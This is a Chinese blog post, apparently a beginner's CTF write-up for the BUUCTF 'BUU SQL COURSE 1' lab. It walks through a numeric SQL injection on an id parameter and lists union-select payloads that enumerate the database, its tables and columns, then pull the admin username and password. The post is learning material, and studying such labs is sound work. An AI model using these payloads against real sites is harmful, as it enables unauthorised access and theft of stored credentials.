BUUCTF_BUU SQL COURSE 1

BUUCTF_BUU SQL COURSE 1

打开实例

image-20241026103803888

发现“热点”及“登录”两个选项

根据题目提示,sql注入,尝试在登录界面寻找注入点,无果

接着进入热点界面,发现三篇新闻,依次点击发现url变化,burp抓包

image-20241026104053872

发现是通过对id值的控制访问不同界面,由此发现注入点

1.判断注入类型,输入1,2-1

?id=1    ?id=2-1

image-20241026104222613

image-20241026104242698

发现回显一样,判断为数字型

2.查找列数

?id=1+order+by+3--+
?id=1+order+by+2--+

得到列数为2,接着构造payload进行查询即可

3.查数据库

?id=0+union+select+1,database()

image-20241026104627938

4.查表

?id=0+union+select+1,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))--+

image-20241026105250888

5.查列

?id=0+union+select+1,(select(group_concat(column_name))from(information_schema.columns)where(table_name='admin'))--+

6.查询username和password

?id=0+union+select+1,(select+username+from+admin)--+
?id=0+union+select+1,(select+password+from+admin)--+

image-20241026105742522

image-20241026105858716

最后登录拿到flag

image-20241026105936561

总结:

这是一道简单的数字型sql注入,关键在于找到注入点,还有对sql查询语句的掌握

写这篇博客也是为了给自己总结一下,刚接触sql注入

posted @   Rain7、  阅读(67)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· DeepSeek 解答了困扰我五年的技术问题。时代确实变了!
· PPT革命!DeepSeek+Kimi=N小时工作5分钟完成?
· What?废柴, 还在本地部署DeepSeek吗?Are you kidding?
· DeepSeek企业级部署实战指南:从服务器选型到Dify私有化落地
· 程序员转型AI:行业分析
点击右上角即可分享
微信分享提示